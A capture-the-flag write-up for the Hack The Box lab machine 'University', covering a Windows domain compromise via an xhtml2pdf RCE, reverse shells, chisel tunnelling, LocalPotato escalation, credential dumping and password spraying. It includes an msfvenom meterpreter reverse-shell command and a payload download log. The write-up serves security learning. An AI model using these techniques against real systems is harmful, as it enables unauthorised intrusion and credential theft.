CTF Write-Up: University HTB

1. Initial Nmap Scan

Initial nmap scan revealed open ports and services.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 16:03 EDT
Nmap scan report for 10.10.11.39
Host is up (0.76s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://university.htb/
|_http-server-header: nginx/1.24.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 03:05:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

2. Initial Foothold

Using exiftool to extract metadata from the profile.pdf:

ExifTool Version Number         : 12.76
File Name                       : profile.pdf
...
Producer                        : xhtml2pdf 
Subject                         : 
Title                           : University | studenthacker Profile

Googling xhtml2pdf led to an interesting RCE vulnerability: CVE-2023-33733.

3. Network Traffic Analysis with tcpdump

We used tcpdump to capture ICMP traffic:

sudo tcpdump -i tun0 icmp

ICMP Traffic:

16:59:34.769517 IP university.htb > kali: ICMP echo request, id 1, seq 2, length 40
16:59:34.769569 IP kali > university.htb: ICMP echo reply, id 1, seq 2, length 40

4. RCE Exploitation

After confirming the RCE, we used a proof of concept (PoC) script. Since nishang didn't work, we used another PoC:

PoC Exploit

Next, we set up an HTTP listener to serve the reverse shell payload:

$ python -m http.server 8000

HTTP Server Logs:

10.10.11.39 - - [08/Aug/2025 17:10:57] "GET / HTTP/1.1" 200 - 
10.10.11.39 - - [08/Aug/2025 17:27:26] "GET /nc.exe HTTP/1.1" 200 -

We successfully got RCE:

RCE Exploitation

5. Enumeration as WAO on Domain Controller

We identified available hosts using PowerShell and Evil-WinRM:

*Evil-WinRM* PS C:\Users\WAO\Documents> Get-ADComputer -Filter * -Property Name | Select-Object Name

Available Hosts:

Pinging LAB-2 to check connectivity:

Pinging LAB-2.university.htb [192.168.99.12] with 32 bytes of data: 
Reply from 192.168.99.12: bytes=32 time<1ms TTL=64

we find hidden credentials on DC on user WAO

Backup File

6. BloodHound as WAO

We used BloodHound to map potential attack paths:

BloodHound Enumeration

Nothing interesting was found initially, so we moved on to RPC client enumeration:

RPC Client

7. Chisel Setup

We noticed a non-routable IP address, so we set up a chisel server and client for tunneling:

Chisel Server Chisel Client

8. Initial Access on LAB-2

We accessed the LAB-2 machine using previous credentials:

LAB-2 Access LAB-2 Access 2

9. Privilege Escalation on DC

We found a root private key used for signing certificates on the DC:

WS-3 Access

We eventually gained access to WS-3 as WAO.

10. Stealing Credentials & Forging Certificates

After a series of failed login attempts, we used msfvenom to generate an exploit:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.99.1 LPORT=4445 -f exe > exploit.exe
Shortcut Invalid Request

We then generated GPG keys:

gpg --gen-key

12. GPG Key Generation and Payload Creation

We created a new key pair and exported the public key:

gpg --export -a martin.rose > gpg-pub.asc
GPG Key Signing Martin Rose 1 Steven User

13. Reverse Shell Access

shell as martin.t on WS-3

gpg -u martin.rose --detach-sign final.zip

We created a tunnel on DC:

*Evil-WinRM* PS C:\Users\WAO\Documents> ./chiselwindows.exe client --fingerprint zY/XdSKNAO+MsVYMhBMJ1sWYQTQlOX7efxgPNS4AdGk= 10.10.16.21:7001 192.168.99.1:4445:10.10.16.21:4445

After submitting course and signature, we waited:

meterpreter > shell
Process 3924 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami:

C:\Windows\system32>whoami
university\martin.t

shell as administrator on WS-3

Hello Professors. We have created this note for all the users on the domain computers: WS-1, WS-2 and WS-3. These computers have not been updated since 10/29/2023. Since these devices are used for content evaluation purposes, they should always have the latest security updates. So please be sure to complete your current assessments and move on to the computers "WS-4" and "WS-5". The security team will begin working on the updates and applying new security policies early next month. Best regards. Help Desk team - Rose Lanosta. 

this note indicated that an older version is used and since wpad is owned by administrators we can abuse it using localpotato

Reverse Shell LocalPotato Exploit Administrator Access

hidden creds on WS-3

We saved the system and SAM registry hives and found a suspicious password:

Lsa Dump

We performed a password spray attack on potential users:

Password Spray Enumeration

Administrator on DC

Using BloodHound, we identified an interesting escalation path starting from rose

Rose User GMSA Credential Reader

We then used this to gain administrator access:

Final Administrator Access

things that didnt go as expected

we tried pivoting using brose.w user but it didnt work

brose.g backup backup

CTF Write-Up: University HTB